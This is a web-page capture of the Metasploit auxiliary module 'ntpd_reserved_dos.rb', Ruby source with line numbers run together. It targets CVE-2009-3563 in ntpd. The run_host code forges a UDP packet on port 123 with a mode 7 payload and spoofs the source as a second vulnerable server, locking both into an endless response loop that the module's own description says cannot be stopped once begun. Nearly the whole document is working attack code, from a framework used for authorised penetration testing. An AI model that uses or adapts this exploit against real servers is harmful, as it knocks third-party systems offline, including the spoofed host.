Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Capture7include Msf::Auxiliary::Scanner89def initialize(info = {})10super(update_info(info,11'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',12'Description' => %q{13This module exploits a denial of service vulnerability14within the NTP (network time protocol) demon. By sending15a single packet to a vulnerable ntpd server (Victim A),16spoofed from the IP address of another vulnerable ntpd server17(Victim B), both victims will enter an infinite response loop.18Note, unless you control the spoofed source host or the real19remote host(s), you will not be able to halt the DoS condition20once begun!21},22'Author' => [ 'todb' ],23'License' => MSF_LICENSE,24'References' =>25[26[ 'BID', '37255' ],27[ 'CVE', '2009-3563' ],28[ 'OSVDB', '60847' ],29[ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]30],31'DisclosureDate' => '2009-10-04'))3233register_options(34[35OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])36])37deregister_options('FILTER','PCAPFILE')3839end4041def run_host(ip)42open_pcap4344print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")4546p = PacketFu::UDPPacket.new47p.ip_saddr = datastore['LHOST']48p.ip_daddr = ip49p.ip_ttl = 25550p.udp_src = 12351p.udp_dst = 12352p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]53p.recalc54capture_sendto(p,ip)5556close_pcap57end58end596061